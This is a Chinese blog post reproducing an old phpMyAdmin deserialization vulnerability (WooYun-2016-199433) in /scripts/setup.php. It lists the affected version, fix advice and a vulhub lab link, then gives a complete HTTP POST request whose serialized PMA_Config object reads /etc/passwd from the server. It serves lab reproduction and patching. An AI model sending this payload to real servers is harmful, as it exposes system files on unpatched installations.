WooYun-2016-199433 -phpmyadmin-反序列化-getshell
2024-10-20 16:17:40
文章参考
http://www.mottoin.com/detail/521.html
https://www.cnblogs.com/xhds/p/12579425.html
虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少
漏洞文件
/scripts/setup.php
影响版本
已知版本为 2.8.0.3
修复建议
尽快升级到最新版 将setup.php中28行中的"configuration"改为传入其他值 直接删除scripts目录,防止被恶意攻击。
环境搭建
https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
复现
1.构造EXP (Linux版)
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
2. 构造EXP (Windows版)
最新文章
- JQuery(2)
- [CareerCup] 6.6 Toggle Lockers 切换锁的状态
- 结构体struts的长度
- Maven入门学习,安装及创建项目
- 系统中使用frameset和Iframe刷新页面session失效
- powershel连接数据库监控数据库状态并发报警邮件
- 在jsp页面中使用自定义标签
- L10 安装网卡驱动
- 抽象工厂模式firstones
- Ultra-QuickSort(树状数组求逆序对数)
- Linux增加开放端口号
- 【XSY3344】连续段 DP 牛顿迭代 NTT
- Python面试真题第二节
- __x__(26)0907第四天__文档流_网页最底层
- 如何在优雅地Spring 中实现消息的发送和消费
- 15、JDBC-CallableStatement
- VS2017中用C#调试DLL
- [APIO2012]派遣
- 线程:生命周期、实现方式、start()和run()的区别!
- C#截取字符串按字节截取SubString
热门文章
- log查看工具log2console
- redis如何实现高可用【主从复制、哨兵机制】
- 递归实现jsonTree
- HTTP笔记1--Web及网络基础
- Yocto项目介绍及入门 -- 嵌入师工程师必备利器
- 在kubernetes集群里集成Apollo配置中心(5)之dubbo服务消费者连接apollo实战
- vuepress &; package.json lock version
- Oh My Zsh All In One
- UIKit and SwiftUI
- prefetch vs preload vs prerender vs preconnect All In One